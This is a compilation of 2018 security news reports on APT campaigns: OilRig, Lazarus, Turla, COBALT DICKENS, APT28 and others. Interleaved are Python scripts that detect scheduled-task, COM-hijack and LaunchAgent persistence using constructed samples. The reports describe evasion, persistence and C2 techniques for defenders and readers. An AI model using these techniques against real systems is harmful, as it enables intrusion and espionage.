In their first operations, Silence used a borrowed backdoor – Kikothac – which makes it clear that the group began its activity without any preparation; these were attempts to test the waters. Later, the group’s developer created a unique set of tools for attacks on card processing and ATMs, including Silence—a framework for infrastructure attacks, Atmosphere—a set of software tools for attacks on ATMs, Farse—a tool to obtain passwords from a compromised computer, and Cleaner—a tool for log removal.

“Silence, in many ways, is changing the perception of cybercrime in terms of the nature of the attacks, the tools, tactics, and even the members of the group. It is obvious that the criminals responsible for these crimes were at some point active in the security community. Either as penetration testers or reverse engineers,” says Dmitry Volkov, Chief Technology Officer and Head of Threat Intelligence at Group-IB.

“They carefully study the attacks conducted by other cybercriminal groups, and analyse antivirus and Threat Intelligence reports. However, it does not save them from making mistakes; they learn as they go. Many of Silence’s tools are legitimate, others they developed themselves and learn from other gangs. After having studied Silence’s attacks, we concluded that they are most likely white hats evolving into black hats. The Internet, particularly the underground web, favours this kind of transformation; it is far easier now to become a cybercriminal than 5–7 years ago—you can rent servers, modify existing exploits, and use legal tools. It makes things more complicated for blue teams and much easier for hackers”.

New OilRig APT campaign leverages a new variant of the OopsIE Trojan
6.9.2018 securityaffairs APT

The Iran-linked APT group OilRig was recently observed using a new variant of the OopsIE Trojan that implements new evasion capabilities.
Experts at Palo Alto Networks observed a new campaign carried out by the Iran-linked APT group OilRig that leverages a new variant of the OopsIE Trojan.

The OilRig hacker group is an Iran-linked APT that has been around since at least 2015; since then it has mainly targeted organizations in the financial and government sectors in the United States and Middle Eastern countries.

The OopsIE Trojan is one of the malware families in the APT’s arsenal; it was detected for the first time in February 2018.

In July the hackers leveraged a new variant of the Trojan that implements new anti-analysis and detection-evasion capabilities.

The OopsIE variant used in the last campaign begins its execution by performing a series of anti-analysis checks.

It checks CPU fan information (this is the first time malware has been seen checking CPU fan information), temperature, mouse pointer, hard disk, motherboard, time zone, and human interaction, while also looking for DLLs associated with Sandboxie, VBox, and VMware.

The campaign also delivered the QUADAGENT backdoor, though experts noticed the group using a different malware for each targeted organization.

“In July 2018, we reported on a wave of OilRig attacks delivering a tool called QUADAGENT involving a Middle Eastern government agency. During that wave, we also observed OilRig leveraging additional compromised email accounts at the same government organization to send spear phishing emails delivering the OopsIE trojan as the payload instead of QUADAGENT.” reads the analysis published by Palo Alto Networks.

“The OopsIE attack also targeted a government agency within the same nation state, though a different organization than the one targeted delivering QUADAGENT.”

The hackers launched spear phishing attacks against a government agency using compromised email accounts at a government organization in the same country in the Middle East.

The OilRig hackers sent the phishing messages to the email address of a user group that had published documents regarding business continuity management; the subject of the messages was in Arabic and translates to “Business continuity management training”.

The new OopsIE variant checks the TimeZone.CurrentTimeZone.DaylightName property and runs only if the value contains one of the strings Iran, Arab, Arabia, or Middle East.

This check limits execution to five time zones covering 10 countries, which makes the attack highly targeted.

Oilrig OopsIE

The new variant uses the www.windowspatch[.]com domain as its C2. It sleeps for two seconds, then moves itself to the App Data folder and creates a scheduled task that runs a VBScript every three minutes to maintain persistence.
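The persistence pattern just described (a scheduled task firing every few minutes to run a VBScript from the user’s profile) is something defenders can hunt for in exported task definitions. The following Python script is an added example, not code from the article or from Palo Alto Networks: it parses Task Scheduler XML (the format produced by a task export) and flags tasks whose action runs a script through the Windows script hosts from a user-writable directory, or repeats at a short interval. The two task definitions it checks are constructed test data; their task paths, file names and intervals are invented.

```python
"""
Flag scheduled tasks matching the persistence pattern described above: a
short repetition interval combined with an action that runs a VBScript
through the Windows script hosts from a per-user directory such as AppData.

Added example for this page, not code from the article or from Palo Alto
Networks. The two task definitions below are constructed test data; their
names, paths and intervals are invented.
"""
import re
import xml.etree.ElementTree as ET

# Namespace used by Task Scheduler XML definitions
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
# Lower-case path fragments that indicate a user-writable location
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\")


def parse_iso_duration(value):
    """Convert a Task Scheduler duration such as 'PT3M' or 'P1DT2H' to seconds."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", value or "")
    if not m or not any(m.groups()):
        return None
    d, h, mi, s = (int(x) if x else 0 for x in m.groups())
    return d * 86400 + h * 3600 + mi * 60 + s


def analyze_task(task_xml, max_interval_seconds=300):
    """Return a list of human-readable findings for one task definition."""
    root = ET.fromstring(task_xml)
    findings = []
    # Shortest repetition interval configured on any trigger of the task
    intervals = [parse_iso_duration(e.text) for e in root.findall(".//t:Repetition/t:Interval", NS)]
    intervals = [i for i in intervals if i is not None]
    shortest = min(intervals) if intervals else None
    for action in root.findall(".//t:Actions/t:Exec", NS):
        cmd = (action.findtext("t:Command", default="", namespaces=NS) or "").strip().lower()
        args = (action.findtext("t:Arguments", default="", namespaces=NS) or "").strip().lower()
        line = f"{cmd} {args}".strip()
        runs_script = cmd.endswith(SCRIPT_HOSTS) or ".vbs" in line or ".js" in line
        if runs_script and any(p in line for p in USER_WRITABLE):
            findings.append(f"script host launched from user-writable path: {line}")
        if runs_script and shortest is not None and shortest <= max_interval_seconds:
            findings.append(f"script action repeats every {shortest}s")
    return findings


# Constructed task resembling the pattern in the text (invented names/paths)
SUSPICIOUS_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <TimeTrigger>
      <Repetition><Interval>PT3M</Interval></Repetition>
      <StartBoundary>2018-07-01T09:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>wscript.exe</Command>
      <Arguments>"C:\Users\alice\AppData\Roaming\update.vbs"</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed benign task: daily, signed-vendor style path, no script host
BENIGN_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2018-07-01T03:00:00</StartBoundary>
      <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Program Files\Vendor\backup.exe</Command>
      <Arguments>/quiet</Arguments>
    </Exec>
  </Actions>
</Task>"""

if __name__ == "__main__":
    for name, xml_text in (("suspicious", SUSPICIOUS_TASK), ("benign", BENIGN_TASK)):
        print(name, analyze_task(xml_text) or "no findings")
```

The interval threshold and the path fragments are deliberately simple so they can be tuned; a short repetition interval alone is common for legitimate tasks, so the script only raises that finding when the action also runs a script host.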

The malware supports various commands: it can write output to a file and send it to the server, download a file to the system, read a specified file and upload its contents, and uninstall itself.

“The OilRig group remains a persistent adversary in the Middle East region. They continue to iterate and add capabilities to their tools while still functionally using the same tactics over and over again.” concludes the report.

“Within the time frame we have been tracking the OilRig group, they have repeatedly shown a willingness to add less commonly found functionality to their tools, such as their heavy use of DNS tunneling in their backdoors or adding authentication to their webshells. This attack is no different, now adding anti-analysis capabilities into their tools. This adversary is highly resourceful and continues to adapt over time,” Palo Alto Networks concludes.

Researchers Draw Connections Between APTs
31.8.2018 securityweek  APT

A newly discovered threat group shares similarities with three advanced persistent threats (APTs), Trend Micro security researchers have discovered.

Referred to as Urpage, the actor is connected to the hacking groups known as Bahamut, Confucius, and Patchwork. Trend Micro found a connection between Confucius and Patchwork in early 2018, but continued the investigation and discovered further evidence of similarities between the groups.

Also known as Dropping Elephant and Chinastrats, Patchwork is a cyberespionage group that was associated with various attacks last year. Operating out of the Indian subcontinent, it targets various entities, including United States-based think tanks.

Urpage, which targets InPage (a word processor for Urdu and Arabic languages under Windows and Mac and a de facto standard Urdu publishing tool), is using a Delphi backdoor component that links it to Confucius and Patchwork, as well as Bahamut-like malware, Trend Micro reveals.

Specifically, the actor is using Android malware that matches Bahamut’s code, but which connects to its own command and control (C&C) infrastructure. Also acting as phishing sites, some of these C&C’s attempt to lure users into downloading malicious applications via links to Google Play (the programs are no longer available in the portal).

However, not all C&C websites advertise malicious applications, the security researchers warn. Some of them only contain a random template with empty categories.

Urpage’s malicious programs are designed to steal information from the compromised machines, the same as the Bahamut applications do. They can retrieve network information and the MAC address, steal SMS messages and contacts, record audio, retrieve GPS location, and steal files with specific extensions.

One of the applications works on top of a modified version of the legitimate Threema end-to-end encrypted messaging software to steal screenshots of messages. While the modified app works normally, the malicious code, which is hidden from the user, takes screenshots every 10 seconds.

The attacker-linked websites also host malicious documents that link Urpage to other threat actors. These include an RTF file that exploits CVE-2017-8750 and an InPage file that exploits CVE-2017-12824, both of which drop VB backdoors.

Trend Micro discovered that Urpage uses the same Delphi file stealer as the threat actor Confucius, and also that the two are linked via a couple of malicious RTF files that download a similar script.

With the Patchwork group also using the Delphi file stealer, the three groups appear related in some form. The link with Patchwork is further strengthened by an Android application that features code similar to that of Bahamut and a C&C that uses the registration pattern of Patchwork’s group, along with infrastructure close to an old Patchwork domain.

“The many similarities and connections show that threat actors do not work in isolation, and that attacks do not necessarily appear from out of nowhere. This may even suggest that a single development team may be behind this attack — maybe a single paid group that has sold its tools and services to other groups with different goals and targets,” Trend Micro concludes.

Iran-linked COBALT DICKENS group targets universities in new phishing campaign
29.8.2018 securityaffairs APT

Experts from SecureWorks discovered a large phishing campaign targeting universities carried out by the Iran-linked threat actor COBALT DICKENS.
Security firm SecureWorks has uncovered a new phishing campaign carried out by the COBALT DICKENS APT targeting universities worldwide; it involved sixteen domains hosting more than 300 spoofed websites for 76 universities in 14 countries, including Australia, Canada, China, Israel, Japan, Switzerland, Turkey, the United Kingdom, and the United States.

“SecureWorks Counter Threat Unit™ (CTU) researchers discovered a URL spoofing a login page for a university. Further research into the IP address hosting the spoofed page revealed a broader campaign to steal credentials.” reads the report published by SecureWorks.

“Sixteen domains contained over 300 spoofed websites and login pages for 76 universities located in 14 countries, including Australia, Canada, China, Israel, Japan, Switzerland, Turkey, the United Kingdom, and the United States”

Iran hackers cobalt dickens attack

Universities are a privileged target for nation-state actors aimed at stealing intellectual property and cutting-edge projects.

Most of the websites spoofed universities’ online library systems; the attackers were interested in accessing those resources to gather intelligence.

Visitors were shown login pages; once they entered their credentials, they were redirected to the legitimate websites, where they were either automatically logged into a valid session or asked to enter their credentials again.

Many of the domains used by COBALT DICKENS were registered between May and August 2018, most of them resolved to the same IP address and DNS name server.

The attackers shared the same infrastructure used by the COBALT DICKENS group in a previous campaign.

Iranian hacking activity has intensified in recent years; security firms have uncovered the activities of many Iran-linked APT groups.

The US Department of Justice and Department of the Treasury announced in March charges against nine Iranians for alleged involvement in a massive state-sponsored hacking scheme; the hackers hit more than 300 universities and tens of companies in the US and abroad and stole “valuable intellectual property and data.”

According to the Treasury Department, since 2013, the Mabna Institute hit 144 US universities and 176 universities in 21 foreign countries.

Geoffrey Berman, US Attorney for the Southern District of New York revealed that the spear phishing campaign targeted more than 100,000 university professors worldwide and about 8,000 accounts were compromised.

The Iranian hackers exfiltrated 31 terabytes of data, roughly 15 billion pages of academic projects.

The hackers also targeted the US Department of Labor, the US Federal Energy Regulatory Commission, and many private and non-governmental organizations.

The sanctions also hit the Mabna Institute, an Iran-based company that had a critical role in coordinating the attacks on behalf of Iran’s Revolutionary Guards.

“In March 2018, the U.S. Department of Justice indicted the Mabna Institute and nine Iranian nationals in connection with COBALT DICKENS activity occurring between 2013 and 2017.” concludes the report.

“Many threat groups do not change their tactics despite public disclosures, and CTU analysis suggests that COBALT DICKENS may be responsible for the university targeting despite the indictments of some members.”

North Korea-linked Hackers Stole $13.5 Million From Cosmos Bank: Report
28.8.2018 securityweek APT  BigBrothers

The North Korea-linked hacking group Lazarus is said to have stolen $13.5 million in a recent cyber-attack targeting SWIFT/ATM infrastructure of Cosmos Bank.

The attackers likely gained access to the bank’s systems via spear phishing and/or remote administration/third-party interface and used multiple attack techniques to steal funds. The theft took place between August 10 and 13, 2018, according to researchers from Securonix.

Believed to be backed by the North Korean government, the Lazarus group was said last year to be the most serious threat to banks. This year, the hackers also focused heavily on crypto-currency exchanges and have been involved in numerous attacks against such organizations.

A recent report also revealed that most malware families originating from North Korea can be linked to Lazarus via code reuse.

Now, Securonix security researchers reveal that Lazarus was behind a high-profile ATM/SWIFT banking attack involving the Cosmos Bank, a 112-year-old cooperative bank in India and the second largest in the country.

As part of the incident, the hackers are believed to have leveraged a previously established foothold before compromising the bank’s internal and ATM infrastructure on August 10-11.

Likely abusing vendor ATM test software or modifying the currently deployed ATM payment switch software, they set up a malicious ATM/POS switch and hijacked the connection between the central switch and the backend/Core Banking System (CBS).

Next, they made adjustments to the target account balances to enable withdrawals and leveraged the malicious switch to authorize ATM withdrawals for over $11.5 million in tens of thousands of domestic and international transactions, using 450 cloned (non-EMV) debit cards in 28 countries.

The malicious switch was used to send fake messages authorizing the transactions and to prevent details sent from the payment switch from reaching the CBS (so checks on card number, card status, PIN, and more were never performed).

On August 13, 2018, likely following lateral movement, the threat actor abused the Cosmos Bank’s SWIFT SAA environment LSO/RSO compromise/authentication to send three international wire transfer requests to ALM Trading Limited at Hang Seng Bank in Hong Kong, amounting to around $2 million.

“The ATM/POS banking switch that was compromised in the Cosmos Bank attack is a component that typically provides hosted ATM/POS terminal support, an interface to core banking solution (CBS) or another core financial system, and connectivity to regional, national or international networks. The primary purpose of the system is to perform transaction processing and routing decisions,” Securonix explains.

By focusing on the bank’s infrastructure instead of basic card-not-present (CNP), jackpotting or blackboxing fraud, the well-planned, highly coordinated attack was able to effectively bypass the bank’s layers of defense against ATM attacks.

The security firm attributes the attack to Lazarus, a group known for the use of Windows Admin Shares for Lateral Movement, the use of custom command and control (C&C) servers that mimic TLS, the use of Windows services for persistence, timestomping, and reflective DLL injection, along with other attack techniques.

Turla Backdoor Controlled via Email Attachments
24.8.2018 securityweek APT

ESET security researchers have analyzed a new backdoor used by the Russian-speaking advanced persistent threat (APT) group known as Turla.

Also known as Snake, or Uroburos, Turla has been active since at least 2007, targeting governments, state officials, diplomats, and military authorities, including Swiss defense firm RUAG and the U.S. Central Command, among others.

Last year, security researchers discovered a link between the group and one of the earliest known state-sponsored cyberespionage operations carried out in the ‘90s.

In 2017, Turla targeted Germany’s Federal Foreign Office, implanting a backdoor on several computers and stealing data for almost the entire year. The hackers first compromised the network of the country’s Federal College of Public Administration and leveraged it to breach the network of the Foreign Office in March 2017.

Now, ESET reveals that the backdoor used in this attack was also used to “open a covert access channel to the foreign offices of another two European countries, as well as to the network of a major defense contractor.”

The backdoor was supposedly created as far back as 2009 and has received numerous updates over time, getting new functionality, including stealth and resilience. A version discovered in April 2018 can execute malicious PowerShell scripts directly in memory, a tactic many actors have been adopting over the past few years.

The malware now targets Microsoft Outlook, subverting the application’s legitimate Messaging Application Programming Interface (MAPI) to access the targets’ mailboxes. Previously, it was observed targeting The Bat! email client, ESET notes.

The backdoor doesn’t use a conventional command-and-control (C&C) infrastructure, being operated via specially crafted PDF files in email attachments instead. The malware is delivered in the form of a Dynamic Link Library (DLL) module and is installed using a legitimate Windows utility (RegSvr32.exe).

For persistence, the threat modifies Windows registry entries. Specifically, it leverages the “COM object hijacking” technique, which ensures that the backdoor is activated each time Microsoft Outlook is launched.
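The COM object hijacking technique mentioned above relies on a per-user CLSID registration under HKEY_CURRENT_USER shadowing the machine-wide one under HKEY_LOCAL_MACHINE, so that a legitimate process instantiating that CLSID loads the attacker’s DLL instead. The following Python script is an added example, not code from ESET’s analysis or from the article: it parses a registry export (.reg) of both hives and flags per-user InprocServer32 entries that point outside the Windows or Program Files directories or that override an existing machine-wide registration. The export it reads is constructed, and every CLSID, path and DLL name in it is invented.

```python
"""
Detect the "COM object hijacking" persistence pattern described above: a
per-user CLSID registration (HKEY_CURRENT_USER, Software/Classes/CLSID) whose
InprocServer32 value points to a DLL outside the Windows or Program Files
directories and shadows the machine-wide registration under HKEY_LOCAL_MACHINE,
so that any process instantiating that CLSID (such as Outlook) loads the DLL.

Added example for this page, not code from ESET's analysis. It parses a
registry export (.reg) so it runs offline; the export below is constructed
and every CLSID, path and DLL name in it is invented.
"""
import re

# Directories an InprocServer32 DLL is normally expected to live in (lower-case)
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
INPROC_RE = re.compile(
    r"^\[(HKEY_CURRENT_USER|HKEY_LOCAL_MACHINE)\\SOFTWARE\\CLASSES\\CLSID\\"
    r"(\{[0-9A-F-]+\})\\INPROCSERVER32\]$",
    re.IGNORECASE,
)


def parse_reg_export(text):
    """Map each key path in a .reg export to its default value ('@'), or None."""
    keys = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line
            keys.setdefault(current, None)
        elif current and line.startswith('@="') and line.endswith('"'):
            # .reg files double every backslash inside string values
            keys[current] = line[3:-1].replace("\\\\", "\\")
    return keys


def find_com_hijacks(reg_text):
    """Return one finding per per-user InprocServer32 entry that looks hijacked."""
    keys = parse_reg_export(reg_text)
    per_user, machine_wide = {}, set()
    for key, value in keys.items():
        m = INPROC_RE.match(key)
        if not m:
            continue
        hive, clsid = m.group(1).upper(), m.group(2).upper()
        if hive == "HKEY_LOCAL_MACHINE":
            machine_wide.add(clsid)
        elif value:
            per_user[clsid] = value
    findings = []
    for clsid, dll in per_user.items():
        path = dll.strip('"').lower()
        untrusted = not path.startswith(TRUSTED_PREFIXES)
        shadows = clsid in machine_wide          # HKCU overrides an HKLM registration
        if untrusted or shadows:
            findings.append({"clsid": clsid, "dll": dll,
                             "untrusted_path": untrusted, "shadows_hklm": shadows})
    return findings


# Constructed export: the first CLSID is registered machine-wide and then
# shadowed per-user by a DLL in the profile; the second is a per-user-only
# registration from a vendor directory. All identifiers are invented.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00000000-1111-2222-3333-444444444444}\InprocServer32]
@="C:\\Windows\\System32\\example_legit.dll"
"ThreadingModel"="Both"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000000-1111-2222-3333-444444444444}\InprocServer32]
@="C:\\Users\\alice\\AppData\\Roaming\\implant_placeholder.dll"
"ThreadingModel"="Apartment"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{AAAAAAAA-BBBB-CCCC-DDDD-EEEEEEEEEEEE}\InprocServer32]
@="C:\\Program Files\\Vendor\\addin.dll"
"ThreadingModel"="Apartment"
"""

if __name__ == "__main__":
    for hit in find_com_hijacks(SAMPLE_REG):
        print(hit)
```

On a live host the same logic can be applied to the output of `reg export` for the two CLSID hives; the check on the DLL path catches first-stage installs under the user profile, while the shadowing check catches the case where the DLL has been placed somewhere that looks legitimate.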

The backdoor generates logs on every sent or received email message (with information on sender, recipient, subject, and attachment name), and regularly bundles the logs together with other data and sends them to Turla’s operators via a PDF attached to an email message.

For each incoming email, the malware checks for the presence of a PDF that may contain commands and accepts commands from anyone able to encode them into a PDF document. This means that Turla’s operators can regain control of an infected machine by sending commands from any email address.

“The backdoor’s level of resilience to takedowns is almost on a par with that of a rootkit that, in inspecting inbound network traffic, listens for commands from its operators,” ESET notes.

On compromised machines, the malware goes to great lengths to stay undetected, and no email received from the attackers ever appears in the mailbox. Moreover, the backdoor also blocks all notifications of incoming email messages that have been sent by its operators.

The malware includes support for a broad range of commands, including file manipulation, shell command execution, process creation, directory manipulation, and more, ESET reveals in a technical analysis (PDF). The main purpose of the malware is data exfiltration and the download and execution of additional programs or commands.

“The Turla backdoor is a fully-fledged backdoor that uses customized and proprietary techniques, can work independently of any other Turla component, and is fully controlled by email. In fact, ESET researchers are not aware of any other espionage group currently utilizing a backdoor that is entirely controlled by emails, and specifically through PDF attachments,” ESET concludes.

North Korea-linked Lazarus APT uses first Mac malware in cryptocurrency exchange attack
24.8.2018 securityaffairs APT

The North Korea-linked Lazarus APT group has, for the first time, used a macOS variant of the Fallchill malware in a cryptocurrency exchange attack.
According to Kaspersky, the North Korea-linked Lazarus group used a macOS malware to target a cryptocurrency exchange in a recent attack.

The activity of the Lazarus Group surged in 2014 and 2015; its members used mostly custom-tailored malware in their attacks, and the experts who investigated the crew consider it highly sophisticated.

This threat actor has been active since at least 2009, possibly as early as 2007, and has been involved in both cyber espionage campaigns and sabotage activities aimed at destroying data and disrupting systems. Security researchers determined that the North Korea-linked Lazarus APT group was behind recent attacks on banks, including the Bangladesh cyber heist.

According to security experts, the group was also behind other large-scale cyber espionage campaigns against targets worldwide, including Operation Troy, Operation DarkSeoul, and the Sony Pictures hack.

Recently the APT has targeted cryptocurrency exchanges and cryptocurrency companies; experts from Kaspersky Lab tracked a new campaign, dubbed Operation AppleJeus, aimed at spreading a tainted cryptocurrency trading application.

“While investigating a cryptocurrency exchange attacked by Lazarus, we made an unexpected discovery. The victim had been infected with the help of a trojanized cryptocurrency trading application, which had been recommended to the company over email.” states the report published by Kaspersky.

“It turned out that an unsuspecting employee of the company had willingly downloaded a third-party application from a legitimate looking website and their computer had been infected with malware known as Fallchill, an old tool that Lazarus has recently switched back to.”

Lazarus infection macOS

The novelty of this attack is that the attacker for the first time used a version of the Fallchill malware specifically developed to target macOS systems, in addition to Windows.

The new development is very important for the strategy of the group that is expanding the list of potential targets.

“The fact that the Lazarus group has expanded its list of targeted operating systems should be a wake-up call for users of non-Windows platforms,” continues Kaspersky.

The malicious code was not inserted into the installation package itself; instead, it was delivered to the target machine in the form of an update.

The experts discovered that the APT used a legitimate-looking application called Celas Trade Pro, which comes from Celas Limited.

At the end of the installation process, the software runs the Updater.exe module that gathers system information and sends it back to the server in the form of a GIF image.

The malware continuously connects to the command and control (C&C) server to fetch and execute an additional executable file.

Based on the server’s response (HTTP status code 200), the updater extracts a base64-encoded payload and decrypts it using RC4 with another hardcoded key to retrieve an executable file.

For macOS users, Celas LLC also provided a native version of its trading app; experts noticed that a hidden ‘autoupdater’ module is installed in the background, starting immediately after installation and again after every system reboot.

At the time of the report, it was not clear whether Lazarus compromised Celas server in a classic supply chain attack or managed to create “a legitimate looking business and inject a malicious payload into a ‘legitimate looking’ software update mechanism.”

Once the Celas Trade Pro app is installed on macOS, it launches the Updater application at system load via a file named “.com.celastradepro.plist.”

Because the file name starts with a dot, the updater is not listed in the Finder app or in the default Terminal directory listing.

The “Updater” file is passed the “CheckUpdate” parameter on start; it quits if no argument is passed.

The updater is implemented using the cross-platform Qt framework; once executed, it creates a unique identifier for the infected host, collects system information, and sends it to the attacker’s server in encrypted form.
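As an added illustration (not code from the Kaspersky report or from the Celas software), the following Python script shows how a defender could audit a LaunchAgents directory for the persistence pattern described above: a dot-prefixed plist that starts an “Updater” binary with the CheckUpdate argument at load. The plist bodies, the program paths and the temporary directory are constructed for this example.

```python
import plistlib
import tempfile
from pathlib import Path

# Constructed sample plist modelled on the article's description: a hidden
# (dot-prefixed) LaunchAgent that starts an "Updater" binary with the
# CheckUpdate argument at load. The label, paths and XML body are assumptions.
HIDDEN_AGENT = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>Label</key><string>com.celastradepro</string>
  <key>ProgramArguments</key>
  <array>
    <string>/Applications/CelasTradePro.app/Contents/MacOS/Updater</string>
    <string>CheckUpdate</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict>
</plist>
"""

# Constructed benign agent for comparison: visible file name, no suspicious args.
BENIGN_AGENT = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>Label</key><string>com.example.backup</string>
  <key>ProgramArguments</key>
  <array><string>/usr/bin/true</string></array>
  <key>RunAtLoad</key><true/>
</dict>
</plist>
"""


def inspect_agent(path):
    """Return a list of reasons why the plist at `path` deserves a look
    (an empty list means nothing matched)."""
    reasons = []
    try:
        with open(path, "rb") as fh:
            data = plistlib.load(fh)
    except Exception as exc:  # a malformed plist is itself worth reporting
        return ["unparseable plist: %s" % exc]

    name = Path(path).name
    if name.startswith("."):
        # Finder and a plain `ls` hide dot-prefixed files, which is exactly
        # why the article's sample used ".com.celastradepro.plist".
        reasons.append("hidden file name (dot prefix)")

    args = data.get("ProgramArguments") or []
    if not args and data.get("Program"):
        args = [data["Program"]]
    if "CheckUpdate" in args[1:]:
        reasons.append("launches a program with the CheckUpdate argument")
    if reasons and data.get("RunAtLoad"):
        # RunAtLoad is normal for LaunchAgents; report it only as context
        # for a file that already matched something suspicious.
        reasons.append("RunAtLoad is set, so it starts at every login/reboot")
    return reasons


def audit_launch_agents(directory):
    """Scan every *.plist in `directory` and return {file name: reasons}
    for the files that matched at least one heuristic."""
    findings = {}
    for path in sorted(Path(directory).iterdir()):
        if not path.name.endswith(".plist"):
            continue
        reasons = inspect_agent(path)
        if reasons:
            findings[path.name] = reasons
    return findings


def demo():
    """Write the two constructed agents to a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        (Path(tmp) / ".com.celastradepro.plist").write_bytes(HIDDEN_AGENT)
        (Path(tmp) / "com.example.backup.plist").write_bytes(BENIGN_AGENT)
        return audit_launch_agents(tmp)


if __name__ == "__main__":
    for name, reasons in demo().items():
        print(name, "->", "; ".join(reasons))
```

On a real Mac, point audit_launch_agents at ~/Library/LaunchAgents and /Library/LaunchAgents; note that `ls` without `-a` will not show the dot-prefixed file the script reports.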

“First of all, Lazarus group has entered a new platform: macOS. There is steadily growing interest in macOS from ordinary users, especially in IT companies. Many developers and engineers are switching to using macOS. Apparently, in the chase after advanced users, software developers from supply chains and some high profile targets, threat actors are forced to have macOS malware tools.” concludes Kaspersky.

“We believe that in the future Lazarus is going to support all platforms that software developers are using as a base platform, because compromising developers opens many doors at once.”

Latest Turla backdoor leverages email PDF attachments as C&C mechanism
24.8.2018 securityaffairs APT

Malware researchers from ESET have published a detailed report on the latest variant of the Turla backdoor that leverages email PDF attachments as C&C.
Malware researchers from ESET have conducted a new analysis of a backdoor used by the Russia-linked APT Turla in targeted espionage operations.

The new analysis revealed a list of high-profile victims that was previously unknown.

Turla is the name of a Russian cyber espionage APT group (also known as Waterbug, Venomous Bear and KRYPTON) that has been active since at least 2007 targeting government organizations and private businesses.

The list of previously known victims is long and also includes the Swiss defense firm RUAG, the US Department of State, and the US Central Command.

Turla’s arsenal is composed of sophisticated hacking tools and malware tracked as Turla (Snake and Uroburos rootkit), Epic Turla (Wipbot and Tavdig) and Gloog Turla.

The new analysis conducted by ESET revealed that the hackers breached Germany’s Federal Foreign Office: Turla infected several computers and used the backdoor to siphon data for almost the whole of 2017.

The cyberspies first compromised the network of the country’s Federal College of Public Administration, then broke into the network of the Foreign Office in March 2017; the hack was discovered by German authorities at the end of the year and publicly disclosed in March 2018. ESET explained that the most important aspect of the new analysis is the discovery of a covert access channel used by Turla to hit the foreign offices of another two European countries.

“Importantly, our own investigation has determined that, beyond this much-publicized security breach, the group has leveraged the same backdoor to open a covert access channel to the foreign offices of another two European countries, as well as to the network of a major defense contractor.” reads the analysis published by ESET.

“These organizations are the latest known additions to the list of victims of this APT group that has been targeting governments, state officials, diplomats, and military authorities since at least 2008.”

The Turla backdoor has been used since at least 2009 and has been continuously improved over the years. The most recent samples are very sophisticated and implement a rare degree of stealth and resilience. The last analyzed variant dates back to April 2018 and implements the ability to execute malicious PowerShell scripts directly in memory.

turla backdoor

The malware analyzed by ESET does not use a classic command and control server; instead, it receives updates and instructions via PDF files delivered by email.

“Rather than using a conventional command-and-control (C&C) infrastructure, such as one based on HTTP(S), the backdoor is operated via email messages; more specifically, through specially crafted PDF files in email attachments.” continues the analysis.

“The compromised machine can be instructed to carry out a range of commands. Most importantly, these include data exfiltration, as well as the downloading of additional files and the execution of additional programs and commands. Data exfiltration itself also takes place via PDF files.”

Information is exfiltrated by generating a PDF containing the siphoned data, which is sent out by email together with message metadata.

“From the PDF documents, the backdoor is able to recover what attackers call a container in the logs. This is a binary blob with a special format that contains encrypted commands for the backdoor,” reads the report released by ESET.

“Technically, the attachment does not have to be a valid PDF document. The only requirement is that it includes a container in the right format.”

The Turla backdoor deletes the messages sent to or received from the attacker in order to remain stealthy.

The backdoor is a standalone DLL (dynamic link library) that interacts with the Outlook and The Bat! email clients; it gains persistence through COM object hijacking. With this trick, the malicious DLL is loaded each time Outlook loads the hijacked COM object.

Unlike other backdoors, the Turla sample subverts Microsoft Outlook’s legitimate Messaging Application Programming Interface (MAPI) to access the targets’ mailboxes while avoiding detection.

The backdoor implements several commands; the full list is shown below:

Turla backdoor

ESET experts did not detect any PDF sample including the commands for the backdoor, but they were able to create such a document.

The full list of Indicators Of Compromise (IoCs) and samples can be found on GitHub.

Microsoft says Russian hackers continue targeting 2018 midterm elections
21.8.2018 securityaffairs BigBrothers  APT

Microsoft has spotted a new hacking campaign targeting 2018 midterm elections, the experts attributed the attacks to Russia-linked APT28 group.
Microsoft has spotted a new hacking campaign targeting 2018 midterm elections.

The tech giant attributed to Russia-linked APT28 a series of cyber attacks aimed at Members of United States’ Senate, conservative organizations and think tanks.

The Russian APT group tracked as APT28 (aka Fancy Bear, Pawn Storm, Sofacy Group, Sednit, and STRONTIUM) has been active since at least 2007, operates under the Russian military agency GRU, and continues to target US politicians.
According to Microsoft, the Russian cyberspies created at least six fake websites related to US Senate and conservative organizations to infect the visitors’ systems.

APT28 fake domains

Three bogus domains were created to appear as legitimate sites belonging to the U.S. Senate; a fourth, non-political website spoofed Microsoft’s online products.
The remaining websites were designed to mimic two U.S. conservative think tanks:

The Hudson Institute — a conservative Washington think tank.
The International Republican Institute (IRI) — a nonprofit group that promotes democracy worldwide and whose board includes prominent Republican figures like Sen. John McCain.
The fake sites were created over the past several months; the hackers registered them with major web-hosting companies.

2018 midterm elections fake election websites
Microsoft did not provide further details on the attacks.

